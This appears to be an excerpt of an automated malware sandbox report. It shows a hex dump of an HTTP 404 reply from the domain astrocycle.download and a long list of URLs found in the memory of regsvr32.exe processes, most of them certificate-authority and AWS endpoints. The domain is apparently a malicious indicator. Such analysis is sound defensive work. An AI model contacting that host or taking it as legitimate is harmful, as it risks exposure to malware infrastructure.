3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://astrocycle.download/
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://crl.roo
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
          Source: regsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: regsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: regsvr32.exe, 00000003.00000002.2102806055.0000000003467000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: regsvr32.exe, 00000003.00000002.2102806055.0000000003467000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://o.ss2.us/0
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://s.ss2.us/r.crl0
          Source: regsvr32.exe, 00000003.00000002.2100967388.0000000002E90000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108703125.0000000002E30000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: regsvr32.exe, 00000003.00000002.2099791165.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2107057604.0000000001CB0000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2114750250.0000000001D90000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: regsvr32.exe, 00000003.00000002.2102806055.0000000003467000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: regsvr32.exe, 00000003.00000002.2102806055.0000000003467000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: regsvr32.exe, 00000003.00000002.2100967388.0000000002E90000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108703125.0000000002E30000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: regsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: regsvr32.exe, 00000003.00000002.2102806055.0000000003467000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: regsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: regsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://x.ss2.us/x.cer0&
          Source: regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
          Source: regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
          Source: regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
          Source: regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/psf/null
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/
          Source: regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/(be&)
          Source: regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/=be&)
          Source: regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/u
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
          Source: regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: https://aws.amazon.com/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc1=h_ls
          Source: regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc2=h_lg
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111365803.000000000309F000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/
